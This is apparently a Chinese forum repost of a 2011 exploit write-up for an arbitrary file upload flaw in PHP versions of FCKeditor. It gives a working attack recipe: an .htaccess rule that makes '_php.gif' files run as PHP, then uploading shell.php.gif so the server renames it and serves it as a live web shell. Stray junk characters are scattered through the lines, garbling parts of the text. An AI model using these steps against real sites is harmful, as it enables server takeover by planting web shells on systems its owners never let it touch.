| FCKeditor所有php版本Upload上传漏洞 作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07 减小字体 增大字体 [+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability7 M# l9 c0 o8 X* N& H7 P, E [+] Date: 2011' Y. F, O0 j3 S- Q2 G [+] Author : sinesafe.cn [+] Website : WwW.sinesafe.cn ——————————————————— 1.create a htaccess file: code:( _2 _6 i' h3 Y& v0 c( V. | <FilesMatch “_php.gif”> SetHandler application/x-httpd-php: K. Q6 v% a. T4 T/ @( r. U </FilesMatch> : x% G7 V% K$ _$ J 2.Now upload this htaccess with FCKeditor.% K! A( `5 n2 Z$ U. o s + D W9 e, T- T http://www.sinesafe.cn/FCKeditor ... er/upload/test.html- R* U& H$ _; M" | http://www.sinesafe.cn/FCKeditor ... onnectors/test.html ( [% A: M# Q; h4 ~ e: Q6 k ———————————————————————————————-# y8 v: p# u7 P4 ^8 i; h0 u6 u 3.Now upload shell.php.gif with FCKeditor.; Z, \, `. F! M% o: |6 }+ U" c% \+ \9 h; \ 4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.9 u% n& {: N( I, D 5.http://www.sinesafe.cn/anything/shell_php.gif 6.Now shell is available from server. |
| 欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |